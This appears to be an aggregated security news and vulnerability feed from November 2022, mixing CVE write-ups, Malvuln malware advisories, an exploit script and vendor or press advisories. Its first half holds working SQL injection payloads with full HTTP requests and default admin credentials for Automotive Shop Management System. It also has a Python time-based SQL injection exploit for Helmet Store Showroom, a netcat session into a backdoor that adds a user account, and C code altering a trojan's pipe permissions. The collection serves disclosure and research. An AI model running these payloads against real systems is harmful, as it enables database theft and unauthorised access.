Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/admin/products/manage_product.php.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/products/manage\_product.php?id=

Vulnerability location: /asms/admin/products/manage\_product.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/products/manage\_product.php?id=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/products/manage\_product.php?id\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44859: bug_report/SQLi-2.md at main · thir3een/bug_report

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/transactions/update_status.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/transactions/update\_status.php?id=

Vulnerability location: /asms/admin/transactions/update\_status.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/transactions/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/transactions/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44860: bug_report/SQLi-3.md at main · thir3een/bug_report

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/products/view_product.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/products/view\_product.php?id=

Vulnerability location: /asms/products/view\_product.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/products/view\_product.php?id=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/products/view\_product.php?id\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44858: bug_report/SQLi-1.md at main · thir3een/bug_report

Backdoor.Win32.Autocrat.b malware suffers from a weak hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/4262a8b52b902aa2e6bf02a156d1b8d4.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.Autocrat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed with PeCompact, listens on TCP port 8536 and requires authentication. However, the password "autocrat" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: AutocratType: PE32MD5: 4262a8b52b902aa2e6bf02a156d1b8d4Vuln ID: MVID-2022-0660Dropped files: srvsupp.exeDisclosure: 11/24/2022Exploit/PoC:C:\Users\gg\Desktop>nc64.exe x.x.x.x 8536Login:autocratWinShell v5.0 (C)2002 janker.org? for helpCMD>?i Installr Removep Pathb reBootd shutDowns Shellx eXitq QuitDownload:CMD>http://.../srv.exe? for helpCMD>sMicrosoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user apparitionsec 666 /addnet user apparitionsec 666 /addThe command completed successfully.C:\Users\Victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Autocrat.b MVID-2022-0660 Weak Hardcoded Credential

Trojan.Win32.DarkNeuron.gen malware creates an IPC pipe with a NULL DACL allowing RW for the Everyone user.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Trojan.Win32.DarkNeuron.genVulnerability: Named Pipe Null DACLFamily: DarkNeuron (Turla Group)Type: PE32MD5: d891c9374ccb2a4cae2274170e8644d8Vuln ID: MVID-2022-0661Disclosure: 11/24/2022Description: The malware process "NCSC.exe" creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group.\\.\Pipe\Winsock2\baseapi_http  RW Everyone  RW BUILTIN\AdministratorsLocal low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications.Exploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exeMD5: d891c9374ccb2a4cae2274170e8644d8NamedPipe Exploit Deny Access to EveryoneBy Malvuln Nov of 2022**/#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2\\baseapi_http"int main(void){  HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);  PACL pOldDACL = NULL;  PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){       printf("%d", GetLastError());   return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){    printf("%d", GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){      printf("%d", GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("%d", GetLastError());     return 1;           }else{        printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");        printf("By Malvuln\n");        printf("Nov of 2022\n");      }      LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);    system("pause");return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.DarkNeuron.gen MVID-2022-0661 Named Pipe NULL DACL

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Helmet Store Showroom 1.0 SQL Injection

In F?Secure Endpoint Protection for Windows and macOS before channel with Capricorn database 2022-11-22_07, the aerdl.dll unpacker handler crashes. This can lead to a scanning engine crash, triggerable remotely by an attacker for denial of service.

**STATUS**: Fixed

**RISK LEVEL**: Medium

**FIX**: No user action is required. The required fix has been published through automatic update channel with Capricorn database on 2022-11-22\_07.

Multiple Denial-of-Service (DoS) vulnerability was discovered in F‑Secure products whereby the aerdl.dll unpacker handler crashes. This can lead to a possible scanning engine crash. The exploit can be triggered remotely by an attacker.

This issue was reported to F-Secure through the Vulnerability Reward Program. No known exploit or attack has been seen in the wild.

F‑Secure Corporation would like to thank faty420 for bringing this issue to our attention.

CVE-2022-38166: CVE-2022-38166 | F-Secure

A new, harder-to-peg version of the ransomware has been rewritten in the Rust programming language.

The APT group DefrayX appears to have launched a new version of its RansomExx malware, rewritten in the Rust programming language -- possibly to avoid detection by antivirus software.

According to IBM Security X-Force Threat researchers, that evasion may be successful, at least for now. IBM reported that one sample that it analyzed "was not detected as malicious in the VirusTotal platform for at least 2 weeks after its initial submission" and that "the new sample is still only detected by 14 out of the 60+ AV providers represented in the platform."

Besides being harder to detect and reverse-engineer, Rust has the advantage of being platform-agnostic. Thus, while the new version of RansomExx runs on Linux, IBM predicts a Windows version will be on its way soon, if it's not already loose and undetected.

RansomExx is far from the only malware package written in Rust. BlackCat, Hive, and, before that, Buer are prominent examples of malware that was rewritten to avoid detection based on the C/C++ versions.

DefrayX is known for its attacks targeting cloud workloads and specific verticals, including healthcare and manufacturing.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Slippery RansomExx Malware Moves to Rust, Evading VirusTotal

Google on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.
Tracked as CVE-2022-4135, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.
Heap-based buffer overflow bugs can be

Google on Thursday released software updates to address yet another zero-day flaw in its Chrome web browser.

Tracked as **CVE-2022-4135**, the high-severity vulnerability has been described as a heap buffer overflow in the GPU component. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw on November 22, 2022.

Heap-based buffer overflow bugs can be weaponized by threat actors to crash a program or execute arbitrary code, leading to unintended behavior.

"Google is aware that an exploit for CVE-2022-4135 exists in the wild," the tech giant acknowledged in an advisory.

But like other actively exploited issues, technical specifics have been withheld until a majority of the users are updated with a fix and to prevent further abuse.

With the latest update, Google has resolved eight zero-day vulnerabilities in Chrome since the start of the year -

*   **CVE-2022-0609** - Use-after-free in Animation
*   **CVE-2022-1096** - Type confusion in V8
*   **CVE-2022-1364** - Type confusion in V8
*   **CVE-2022-2294** - Heap buffer overflow in WebRTC
*   **CVE-2022-2856** - Insufficient validation of untrusted input in Intents
*   **CVE-2022-3075** - Insufficient data validation in Mojo
*   **CVE-2022-3723** - Type confusion in V8

Users are recommended to upgrade to version 107.0.5304.121 for macOS and Linux and 107.0.5304.121/.122 for Windows to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Update Chrome Browser Now to Patch New Actively Exploited Zero-Day Flaw

In affected versions of Octopus Server it is possible for target discovery to print certain values marked as sensitive to log files in plaint-text in when verbose logging is enabled.

Summary

Target Discovery prints certain sensitive values in plain-text when verbose logging is enabled (CVE-2022-2721)

Advisory Number

2022-24

Discovery Date

08 Aug 2022

Patch Release Date

21 Aug 2022

Advisory Release Date

25 Nov 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2721

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10807 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Server it is possible for target discovery to print certain values marked as sensitive to log files in plaint-text in when verbose logging is enabled

The versions of Octopus Server affected by this vulnerability are:

*   All 2022.2.x versions before 2022.2.7965
*   All 2022.3.x versions before 2022.3.9163

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.2.7965
*   2022.3.9163

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10807). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10807):**

If you have feature version...

...then upgrade to this version

2022.2.x

2022.2.7965 or greater

2022.3.x

2022.3.9163 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2721, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found during internal testing by Matt Hilton at Octopus Deploy.

Tag

#windows